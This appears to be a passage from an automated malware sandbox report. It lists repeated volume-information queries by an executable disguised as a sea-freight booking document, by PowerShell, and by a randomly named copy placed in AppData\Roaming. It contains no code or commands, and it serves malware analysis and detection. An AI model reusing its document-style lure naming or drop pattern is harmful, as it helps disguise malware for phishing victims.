Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
